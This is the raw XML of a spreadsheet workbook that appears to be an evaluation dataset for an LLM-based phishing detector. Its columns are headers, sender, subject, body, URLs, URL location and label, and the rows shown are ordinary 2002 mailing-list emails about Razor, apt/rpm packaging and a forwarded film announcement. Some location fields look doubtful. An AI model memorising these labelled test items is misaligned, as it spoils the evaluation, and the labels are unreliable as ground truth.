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mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\franc\PycharmProjects\AntiPhish-LLM\evaluation\datasets\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3517C5F3-B59E-479C-9B9A-844B52CA72FB}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="11020" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="phishing" sheetId="3" r:id="rId1"/>
    <sheet name="legit" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet1" sheetId="1" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="ExternalData_1" localSheetId="1" hidden="1">legit!$A$1:$J$2001</definedName>
    <definedName name="ExternalData_2" localSheetId="0" hidden="1">phishing!$A$1:$J$2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2310CF-3E65-413D-8AF2-D3E929D665E3}" keepAlive="1" name="Query - legit" description="Connection to the 'legit' query in the workbook." type="5" refreshedVersion="8" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=legit;Extended Properties=&quot;&quot;" command="SELECT * FROM [legit]"/>
  </connection>
  <connection id="2" xr16:uid="{F3EAF216-E31B-48AF-8E34-244F4F071651}" keepAlive="1" name="Query - phishing" description="Connection to the 'phishing' query in the workbook." type="5" refreshedVersion="8" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=phishing;Extended Properties=&quot;&quot;" command="SELECT * FROM [phishing]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="34020" uniqueCount="22367">
  <si>
    <t>mail_id</t>
  </si>
  <si>
    <t>headers</t>
  </si>
  <si>
    <t>date</t>
  </si>
  <si>
    <t>sender</t>
  </si>
  <si>
    <t>receiver</t>
  </si>
  <si>
    <t>subject</t>
  </si>
  <si>
    <t>body</t>
  </si>
  <si>
    <t>urls</t>
  </si>
  <si>
    <t>url_location</t>
  </si>
  <si>
    <t>label</t>
  </si>
  <si>
    <t>To: &lt;Razor-users@example.sourceforge.net&gt;\nFrom: "Sven" &lt;sven@dmv.com&gt;\nDate: Wed, 9 Oct 2002 23:37:05 -0400</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 23:37:05 -0400</t>
  </si>
  <si>
    <t>"Sven" &lt;sven@dmv.com&gt;</t>
  </si>
  <si>
    <t>&lt;Razor-users@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[Razor-users] razor vs cloudmark - merging?</t>
  </si>
  <si>
    <t>I am somewhat puzzled by a phone call I (or rather the CIO at the ISP for\nwhom I work) received from an individual claiming to represent Cloudmark.\nThe gist of the call was that since we were using razor and checking our\nmail against the razor servers and that since those servers contain\ninformation proprietary to Cloudmark, we would [in the near future?] be\nrequired to begin paying Cloudmark/spamnet $1.00/user per year. I was\nwondering if anyone else has received such a call?\n\nI am curious as to whether a spammer has begun to try contacting razor users\nwith the above tactic in an effort to get them to stop using razor or\nwhether the open source/community aspect of the razor project is going by\nthe wayside in lieu of a strictly commercial approach (ala brightmail and\nthe likes).\n\nSven\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>USA</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Ian Andrew Bell &lt;fork@ianbell.com&gt;\nDate: Wed, 9 Oct 2002 23:18:20 -0700</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 23:18:20 -0700</t>
  </si>
  <si>
    <t>Ian Andrew Bell &lt;fork@ianbell.com&gt;</t>
  </si>
  <si>
    <t>fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Fwd: [POLITICOS] Re: "Bowling for Columbine," Opens This Friday</t>
  </si>
  <si>
    <t>Begin forwarded message: &gt; From: Ian Andrew Bell  &gt; Date: Wed Oct 9, 2002  11:16:09 PM US/Pacific &gt; To: mike@michaelmoore.com &gt; Cc: foib@ianbell.com &gt; Subject: [POLITICOS] Re: "Bowling for Columbine," Opens This Friday &gt; &gt; Michael, &gt; &gt; Why is it that people who consider voting in an election an  &gt; inconvenience would go to see a movie to show support for its message?  &gt;  Don't get me wrong -- I think this is the case.  People will go to  &gt; see your movie as much to be entertained and informed as they will to  &gt; express their malice and discontent towards not only the present  &gt; regime in America, but also the corrupt, empty, shallow pantomime  &gt; which cast them into power. &gt; &gt; In reality, today the voting that takes place via the act of  &gt; consumption far outweighs the impact caused by people going to a booth  &gt; and dimpling the appropriate chad, or some other such convoluted act  &gt; of free democratic expression. &gt; &gt; Why?  Because in America, they believe in dollars.  Dollars don't lie.  &gt;  In practise, they are the last frontier of truth in America,  &gt; universally accepted as expressions of fear, desire, passion, and  &gt; need.  Compared to the swing of the almighty buck, and Jeb Bush knows  &gt; this, a hanging chad has only the nethermost meaning. &gt; &gt; Given that fact, I modestly propose an entirely new, though wholly  &gt; logical, extension to the current democratic system in place in  &gt; America: &gt; &gt; I propose we augment, and effectively replace, the electoral system  &gt; with a political stock market.  We should accept that Politicians are  &gt; entrepreneurs just like any other businessperson in America, and  &gt; embrace this fact in building an economic system which truly reflects  &gt; their intent.  A politician should issue a constant number of shares  &gt; dependent upon his tenure in government.  Those shares should be  &gt; traded on an open exchange, say the G.R.E.E.D. (short, of course, for  &gt; the "Global Realists' Electoral Exchange -- Democratic").  Politicians  &gt; we believe in will see their stocks rise higher as faith in their  &gt; ability to maintain office grows.  As the truth about their embezzling  &gt; campaign funds for weekend trips to Maui with their interns is  &gt; revealed, of course, their fortunes will fall. &gt; &gt; This represents an opportunity for the market forces -- those same  &gt; forces which you intend to harness to express your own personal  &gt; protest -- to voice their opinion on the quality of America's  &gt; governance during the intervening four years between elections.   &gt; Elections themselves will in effect become meaningless, as they are  &gt; now, since their outcome will be influenced by the stock price of each  &gt; and every congressman, senator, and presidential candidate. &gt; &gt; Just think of the coverage that could be given on MSNBC!  "Strom  &gt; Thurman (STROM: news - quotes) was down 15% today on fears that his  &gt; latest heart operation will render him unable to attend Senate Armed  &gt; Services committee meetings until November.."  This would provide  &gt; rejuvenating content to the econo-political news sector, which has  &gt; found post-economic-bubble coverage to be both tiresome and  &gt; deoressing.  The establishment of this new stock exchange would of  &gt; course create jobs for newly unemployed (and governmentally retrained)  &gt; IT systems engineers who could, after passing the electoral securities  &gt; exam, become floor traders. &gt; &gt; This would also allow for a convenient and very public method by which  &gt; candidates could raise capital in the public markets to support their  &gt; multi-billion-dollar campaigns.  The requirement for the support of  &gt; legions of spin doctors, permanent campaign managers, and investor  &gt; relations personnel would also create jobs -- perhaps even a new  &gt; practice for Ernst &amp; Young, Arthur Anderson, et al.  Insider trading  &gt; scandals and misleading revenue declarations would of course catch  &gt; Martha Stewart as an unwitting beneficiary, thus spreading her  &gt; influence to politics. &gt; &gt; Dividends, if there are any on record, at the close of a politician's  &gt; career could be paid to current shareholders based on the holdings.   &gt; Pensions funds could provide the institutional investment support  &gt; necessary to underpin even the biggest dogs among the Beltway set.   &gt; Union funds, brokerages, and even pump-and-dump houses could benefit  &gt; from meteoric rises in conservative candidates running in the  &gt; Southeast, and the Bush Governmet would be allowed to place Social  &gt; Security bets where they really mattered.   investors who lose their  &gt; retirement, life savings, and support could rest assured that they  &gt; were indeed robbed by crooks rather than poor investors. &gt; &gt; Although there's no way to protect any of these for Worldcom-like  &gt; crashes, ambitious, inspired, District Attorneys could file criminal  &gt; suits against Candidates and Campaign Managers who underperform  &gt; expectations, thus assuring investors that their logic was not faulty  &gt; -- instead, they were merely defrauded by crooks and thieves. &gt; &gt; On the whole, I believe the system could work.  I could certainly work  &gt; as well as our beloved securities trading industry and, given the  &gt; American electoral system's success at effectively expressing the will  &gt; of the people, it certainly couldn't do any worse... &gt; &gt; In the meantime, Mike, I think I'll go see your movie and try to  &gt; depose the President. &gt; &gt; -Ian. &gt; &gt; &gt; &gt; On Wednesday, October 9, 2002, at 03:53 PM, Michael Moore's Mailing  &gt; List wrote: &gt; &gt;&gt; October 9, 2002 &gt;&gt; &gt;&gt; My Film, "Bowling for Columbine," Opens This Friday &gt;&gt; &gt;&gt; Dear friends, fans, and fellow evildoers: &gt;&gt; &gt;&gt; I am very happy and excited to tell you that this Friday, October 11,  &gt;&gt; my &gt;&gt; new &gt;&gt; film, "Bowling for Columbine," will open in New York and Los Angeles. &gt;&gt; &gt;&gt; It is, I promise, the last thing the Bushies want projected on the  &gt;&gt; movie &gt;&gt; screens across America this week. The film is, first and foremost, a &gt;&gt; devastating indictment of the violence that is done in our name for  &gt;&gt; profit &gt;&gt; and power -- and no one, in all the advance screenings I have  &gt;&gt; attended, has &gt;&gt; left the theatre with anything short of rage. I truly believe this  &gt;&gt; film has &gt;&gt; the potential to rock the nation and get people energized to do  &gt;&gt; something. &gt;&gt; &gt;&gt; This is not good news for Junior and Company. Not when they are  &gt;&gt; trying to &gt;&gt; drag us into another war. Not when a crazed sniper is exercising his &gt;&gt; constitutional right to own a high-powered rifle. Not when John  &gt;&gt; Ashcroft is &gt;&gt; still prohibiting the FBI from looking through the gun background  &gt;&gt; check &gt;&gt; files to see if any of the 19 hijackers or their associates purchased  &gt;&gt; any &gt;&gt; weapons prior to 9/11 -- because THAT, we are told, would "violate"  &gt;&gt; these &gt;&gt; terrorists' sacred Second Amendment rights! &gt;&gt; &gt;&gt; Yes, I believe this movie can create a lot of havoc -- but I will  &gt;&gt; need ALL &gt;&gt; of you to help me do this. Are you game? &gt;&gt; &gt;&gt; Last February 5th, I wrote to tell you about a book I had written and  &gt;&gt; how &gt;&gt; the publisher had decided to dump it because they were afraid to  &gt;&gt; publish &gt;&gt; anything critical of Bush after 9/11. I appealed to you to save  &gt;&gt; "Stupid &gt;&gt; White Men" from the shredder and to go out and buy it. I promised you  &gt;&gt; would &gt;&gt; not regret it, and that the book would not only be a great read but an &gt;&gt; important organizing tool in gumming up the plans of George W. Bush. &gt;&gt; &gt;&gt; Within 24 hours, the book went to #1 on the Amazon best seller list.  &gt;&gt; By the &gt;&gt; fifth day, the book was already into its 9th printing. The publisher  &gt;&gt; was &gt;&gt; torn between its desire to kill the book or make a wad of money.  &gt;&gt; Greed won &gt;&gt; out, and this Sunday the book enters its 31st week on the New York  &gt;&gt; Times &gt;&gt; best seller list -- and its 32nd printing. This is all because of  &gt;&gt; you, my &gt;&gt; crazy and loyal friends. You made this happen, against all the odds. &gt;&gt; &gt;&gt; Now I would like to ask you again to help me with my latest work,  &gt;&gt; "Bowling &gt;&gt; for Columbine." It's a movie that many critics have already called my  &gt;&gt; best &gt;&gt; film to date. They may be right. It is certainly the most provocative  &gt;&gt; thing &gt;&gt; I have ever done. I have spent three years on it and, I have to say,  &gt;&gt; it &gt;&gt; cuts &gt;&gt; deeper, harder and funnier that anything I have given you so far. &gt;&gt; &gt;&gt; The movie opens this Friday in New York and Los Angeles, and then in  &gt;&gt; 8 more &gt;&gt; cities next week. How it does in these first ten cities will determine &gt;&gt; whether or not the rest of the country gets to see it. That is the  &gt;&gt; nutty &gt;&gt; way &gt;&gt; our films are released. If it doesn't have a big opening weekend, you  &gt;&gt; can &gt;&gt; kiss the film good-bye. Therefore, this weekend, this film must be  &gt;&gt; seen by &gt;&gt; millions of Americans. Can you help me make that happen? &gt;&gt; &gt;&gt; "Bowling for Columbine" is not a film simply about guns or school &gt;&gt; shootings. &gt;&gt; That is only the starting point for my 2-hour journey into the dark  &gt;&gt; soul of &gt;&gt; a country that is both victim and master of an enormous amount of  &gt;&gt; violence, &gt;&gt; both at home and around the world. With this movie I have broadened my &gt;&gt; canvas to paint a portrait of our nation at the beginning of the 21st &gt;&gt; century, a nation that seems hell-bent on killing first and asking &gt;&gt; questions &gt;&gt; later. It is a movie about the state sponsored acts of violence and &gt;&gt; terrorism against our own poor, and how we have created a culture of  &gt;&gt; fear &gt;&gt; that is based on the racial dilemma we continue to ignore. And it's a &gt;&gt; devastating comedy. &gt;&gt; &gt;&gt; This film is going to upset some pretty big apple carts. No film has  &gt;&gt; EVER &gt;&gt; said the things I am saying in "Bowling for Columbine." I expect to be &gt;&gt; attacked. I expect certain theatres will not show it for fear of &gt;&gt; retribution. I expect that this movie will be a bitter pill for many  &gt;&gt; to &gt;&gt; swallow. &gt;&gt; &gt;&gt; This is why I need your help. Movies live or die based on what  &gt;&gt; happens at &gt;&gt; the box office the first weekend of its release. I need you, if you  &gt;&gt; live in &gt;&gt; the New York or L.A. area, to go see "Bowling for Columbine" this  &gt;&gt; Friday &gt;&gt; and &gt;&gt; Saturday -- and take as many family members and friends with you as &gt;&gt; possible. I guarantee you will not be disappointed -- and you may  &gt;&gt; just see &gt;&gt; one of the best films of the year. &gt;&gt; &gt;&gt; Monday night in Times Square, "Bowling for Columbine" had its  &gt;&gt; premiere. The &gt;&gt; crowd was amazing, as it was this past Saturday night at the Chicago  &gt;&gt; Film &gt;&gt; Festival. The audience kept laughing or hooting or applauding so loud &gt;&gt; throughout the film that it was hard to hear the next line. &gt;&gt; &gt;&gt; The hate mail, the threats, the promises of retribution have already &gt;&gt; started &gt;&gt; to roll in to the distributor of this movie, United Artists. They are  &gt;&gt; not &gt;&gt; backing down. But how long will this last? I need all of you in the  &gt;&gt; New &gt;&gt; York &gt;&gt; tri-state and southern California areas to go see "Bowling for  &gt;&gt; Columbine" &gt;&gt; THIS weekend -- the rest of you can see it in a couple of weeks when  &gt;&gt; it &gt;&gt; comes to your town. A strong opening not only means that the rest of &gt;&gt; America &gt;&gt; will see this film, it means that a good number of people who see it  &gt;&gt; are &gt;&gt; going to leave the film angry enough to get active and get involved.  &gt;&gt; If it &gt;&gt; does poorly, I will have a difficult time finding the funding for the  &gt;&gt; movie &gt;&gt; I want to make next -- a film about 9/11 and how Bush is using that  &gt;&gt; tragic &gt;&gt; day as a cover for his right-wing agenda. &gt;&gt; &gt;&gt; Don't let that happen. Don't let the NRA have one more success by  &gt;&gt; stopping &gt;&gt; the wider distribution of this movie. And, together, let us not remain &gt;&gt; silent in our opposition to Bush's phony war against Iraq. &gt;&gt; &gt;&gt; If you live in New York, you can see it at the Lincoln Plaza, the  &gt;&gt; Sunshine &gt;&gt; and the Loews 19th St. In L.A., you can catch it at the Sunset 5, the &gt;&gt; Westwood Regent, Laemmle Sunset, Laemmle Towncenter (Encino), Landmark &gt;&gt; Rialto (Pasadena), and Regal University (Irvine). Also, please  &gt;&gt; forward this &gt;&gt; to your other friends and tell them to go see "Bowling for Columbine"  &gt;&gt; this &gt;&gt; weekend. &gt;&gt; &gt;&gt; And finally, don't miss our new website [URL]www.bowlingforcolumbine.com[/URL] &gt;&gt; &gt;&gt; Thank you for your help with this. I feel so honored and privileged  &gt;&gt; to have &gt;&gt; so many people interested in my work. Last January I was getting  &gt;&gt; 70,000 &gt;&gt; hits &gt;&gt; a month on my website. Last month, I got 17 million hits. This alone  &gt;&gt; speaks &gt;&gt; volumes about the vast majority all of us belong to who are sick and  &gt;&gt; tired &gt;&gt; of what is going on and are longing for an alternative source of &gt;&gt; information. &gt;&gt; &gt;&gt; I hope that you enjoy "Bowling for Columbine." &gt;&gt; &gt;&gt; Thank you again... &gt;&gt; &gt;&gt; Yours, &gt;&gt; &gt;&gt; Michael Moore &gt;&gt; &gt;&gt; --- &gt;&gt; &gt;&gt; If you wish to be be unsubscribed from this mailing list, please  &gt;&gt; click the &gt;&gt; link below and follow the instructions. &gt;&gt; &gt;&gt; [URL]http://www.michaelmoore.com[/URL] &gt;</t>
  </si>
  <si>
    <t>www.bowlingforcolumbine.com http://www.michaelmoore.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 9 Oct 2002 22:47:06 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 22:47:06 +0200</t>
  </si>
  <si>
    <t>Matthias Saou &lt;matthias@rpmforge.net&gt;</t>
  </si>
  <si>
    <t>rpm-zzzlist@freshrpms.net</t>
  </si>
  <si>
    <t>Re: Apt 0.3 and 0.5</t>
  </si>
  <si>
    <t>Once upon a time, Thomas wrote : &gt; Should I expect problems if my apt server is running RH 7.3/Apt 0.3 and &gt; some clients are coming on line and will be running RH 8.0/Apt 0.5? Do &gt; the two different version interoperate? No problems whatsoever. Currently apt.freshrpms.net is running 7.3 with apt 0.3 and many 8.0 clients with 0.5 are using it. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10 Load : 0.10 0.11 0.10, AC on-line, battery charging: 100% (1:47) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://freshrpms.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>IRN</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 9 Oct 2002 18:18:01 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 18:18:01 +0200</t>
  </si>
  <si>
    <t>Re: xine cannot play DVDs - "liba52: a52_block error"</t>
  </si>
  <si>
    <t>Once upon a time, Jon wrote : &gt; Since libdvdcss-1.2.0, I have been unable to play DVDs using ogle, xine, &gt; vlc, or mplayer.  They all show a scrambled picture with (VERY) choppy &gt; audio.  When I run xine I see tons of these in the console:  &gt;  &gt; liba52: a52_block error &gt; liba52: a52_block error &gt; liba52: a52_block error &gt; liba52: a52_block error &gt; audio_out: inserting 5859 0-frames to fill a gap of 10989 pts &gt; metronom: audio jump &gt; liba52: a52_block error &gt;  &gt; Has anyone seen this before and know how to fix it?  Or should I file a &gt; bug report?   Hi, First of all, sorry for not replying to your private email from last week, but I really don't have a slight idea of what could be causing this! - Is this with different DVDs or a single one? - Is this using OSS or ALSA? Have you tried both? - Is this using binariy packages or recompiling source ones? I remember a user having trouble with a particular DVD ever since upgrading libdvdcss to a recent version, but haven't heard the end of the story. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.07 0.20 0.21 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Steve Kann &lt;stevek@SteveK.COM&gt;\nDate: Wed, 9 Oct 2002 15:28:55 -0400</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 15:28:55 -0400</t>
  </si>
  <si>
    <t>Steve Kann &lt;stevek@SteveK.COM&gt;</t>
  </si>
  <si>
    <t>Re: Ack, apt-get still failing for me, stumped. [RH8]</t>
  </si>
  <si>
    <t>I've also just tried doing rpm --rebuilddb, no change. A question: Do these files look too small?   root@canarsie:/var/cache/apt # ls -ltr total 148 drwxr-xr-x    2 root     root         4096 Sep 29 10:49 gensrclist drwxr-xr-x    2 root     root         4096 Sep 29 10:49 genpkglist drwxr-xr-x    3 root     root         4096 Oct  8 19:59 archives -rw-r--r--    1 root     root        49863 Oct  9 15:25 srcpkgcache.bin -rw-r--r--    1 root     root       158131 Oct  9 15:25 pkgcache.bin I ran strings on them, and it doesn't look like I see a complete listing of either my system's installed RPMs, or the rpms in the lists: root@canarsie:/var/state/apt/lists # ls -s total 9988  416 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.freshrpms 8704 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.os    0 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.updates    4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.freshrpms    4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.os    4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.updates   64 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.freshrpms  788 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.os    0 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.updates    0 lock    4 partial If I kill them, they get recreated about the same size next time I run apt-get.. -SteveK On Tue, Oct 08, 2002 at 08:01:48PM -0400, Steve Kann wrote: &gt;  &gt; I posted about this last week, and I'm still stumped.  apt-get is just &gt; not working for me, and I can't figure out what the problem is. &gt;  &gt; I've tried removing the apt rpms, making sure to remove any traces left &gt; behind (/etc/apt /var/state/apt /var/cache/apt), and still, I get &gt; "couldn't find package xmms-mp3" when running "apt-get install xmms-mp3". &gt;  &gt; Any clues?  Here's a log of a fresh try: &gt;  &gt; root@canarsie:/tmp # rpm -e apt apt-devel &gt; root@canarsie:/tmp # rm -rf /etc/apt /var/cache/apt /var/state/apt &gt; root@canarsie:/tmp # rpm -ivh apt-0.5.4cnc7-fr1.i386.rpm apt-devel-0.5.4cnc7-fr1.i386.rpm &gt; warning: apt-0.5.4cnc7-fr1.i386.rpm: V3 DSA signature: NOKEY, key ID &gt; e42d547b &gt; Preparing...                ########################################### [100%] &gt;    1:apt                    ########################################### [ 50%] &gt;    2:apt-devel              ########################################### [100%] &gt; root@canarsie:/tmp # apt-get update &gt; Ign [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386 release &gt; Get:1 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/os pkglist [1276kB] &gt; Get:2 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/os release [108B] &gt; Get:3 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/updates pkglist [14B] &gt; Get:4 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/updates release [113B] &gt; Get:5 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/freshrpms pkglist &gt; [57.1kB] &gt; Get:6 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/freshrpms release &gt; [125B] &gt; Get:7 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/os srclist [152kB] &gt; Get:8 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/updates srclist [14B] &gt; Get:9 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/freshrpms srclist &gt; [14.4kB] &gt; Fetched 1500kB in 11s (125kB/s) &gt; Reading Package Lists... Done &gt; root@canarsie:/tmp # apt-get install xmms-mp3 &gt; Reading Package Lists... Done &gt; Building Dependency Tree... Done &gt; E: Couldn't find package xmms-mp3 &gt; root@canarsie:/tmp # apt-cache search xmms &gt; root@canarsie:/tmp # &gt;  &gt;  &gt; Beats me.. &gt;  &gt; -SteveK &gt;  &gt;  &gt;  &gt; --  &gt;   Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775 &gt;                 HorizonLive.com - collaborate . interact . learn &gt;    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux." --    Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775                 HorizonLive.com - collaborate . interact . learn    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux." _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://apt.freshrpms.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nFrom: Samuel Checker &lt;sc@pffcu.org&gt;\nDate: Wed, 9 Oct 2002 11:27:39 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 11:27:39 -0400 (EDT)</t>
  </si>
  <si>
    <t>Samuel Checker &lt;sc@pffcu.org&gt;</t>
  </si>
  <si>
    <t>Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] Razor and Pine</t>
  </si>
  <si>
    <t>On Wed, 9 Oct 2002, Brian Fahrlander wrote: &gt; On Wed, 9 Oct 2002 09:15:03 -0400 (EDT), Samuel Checker  wrote: &gt; &gt; &gt; I've been testing Razor, invoked from sendmail/procmail and so far it &gt; &gt; seems pretty copacetic. Last night's spam to the list provided a good test &gt; &gt; - the spam itself as well as several of the responses were flagged, as &gt; &gt; other list members reported. &gt; &gt; &gt; &gt;     Are you using Spamassassin on the input side?  I've just changed my sendmail installation and am looking for the 'proper' way to pass it through there, systemwide, before accepting it and sending it to the users.  It's kinda problematic to set up procmail scripts for every user, when the user's home directories are NFS mounted....and the source is on my own machine, on which I try new things. (And it's the only machine with the drivespace...) &gt; I've not used Spamassassin on the KISS principle. I just have procmail adding an X-header and optionally modifying the Subject if razor-check comes back positive. --  sc ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 9 Oct 2002 11:03:11 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 11:03:11 +0200</t>
  </si>
  <si>
    <t>Re: Apt repository authentication: it's time</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote : &gt;      OK, it's now time to work out the PGP securing of apt repository &gt;      traffic. I've never gotten anything but "sitename.whatever will not &gt;      be authenticated" until running Redhat 8.0 when I get something &gt;      about having "No Key" for various files. I don't think gpg signing my repositories will help anything, as it will just ensure that my passphrase was typed to confirm the md5 signatures of all pgklists and srclists. Basically, you'll then just be sure that it's me who generated the files, and this will of course prevent automating the process of updating the apt repository when Red Hat updates show up. In Red Hat Linux 8.0 though, the warnings about "No Key" appear until you import the right gpg public keys directly with rpm, for example : rpm --import /usr/share/doc/apt-0.5.4cnc7/RPM-GPG-KEY (this will import my key, which is used to sign all freshrpms.net packages) Hopefully it is possible to the tell rpm to install *only* packages who verify against an imported gpg key? This for me would be the optimal way to ensure integrity with the way things curently work. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.14 0.18 0.17 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ralf Ertzinger &lt;ralf@camperquake.de&gt;\nDate: Wed, 9 Oct 2002 10:28:23 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 10:28:23 +0200</t>
  </si>
  <si>
    <t>Ralf Ertzinger &lt;ralf@camperquake.de&gt;</t>
  </si>
  <si>
    <t>Hi. Brian Fahrlander  wrote: &gt;     What's it take to ensure we're covered against this kind of &gt;     childish/moronic/Microsoft-era problems? Well, I am checking the packet signatures while building the apt-tree. Not very pretty, not very fast, but it works. Nonetheless: did anyone ever play with this: [URL]http://distro.conectiva.com.br[/URL] --  R! _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://distro.conectiva.com.br http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Wed, 9 Oct 2002 10:11:27 -0500</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 10:11:27 -0500</t>
  </si>
  <si>
    <t>razor-users@example.sourceforge.net</t>
  </si>
  <si>
    <t>On Wed, 9 Oct 2002 09:15:03 -0400 (EDT), Samuel Checker  wrote: &gt; I've been testing Razor, invoked from sendmail/procmail and so far it &gt; seems pretty copacetic. Last night's spam to the list provided a good test &gt; - the spam itself as well as several of the responses were flagged, as &gt; other list members reported. &gt;  &gt; This morning I piped the messages out from pine, being careful to use the &gt; RAW mode, to razor-check -d. None of the messages come back as spam, even &gt; the spam. Since folks revoked the false positives, I understand why they &gt; would not come up, but not the spam itself, unless that also was revoked. &gt;  &gt; Is this spam just a bad one to test against, or is there some setting in &gt; pine or razor that I am missing?     Are you using Spamassassin on the input side?  I've just changed my sendmail installation and am looking for the 'proper' way to pass it through there, systemwide, before accepting it and sending it to the users.  It's kinda problematic to set up procmail scripts for every user, when the user's home directories are NFS mounted....and the source is on my own machine, on which I try new things. (And it's the only machine with the drivespace...)    ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ angegangen, Schlange-Hften, sein es ganz rber jetzt. Bgel innen fest, weil es eine lange, ssse Fahrt ist.  ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net 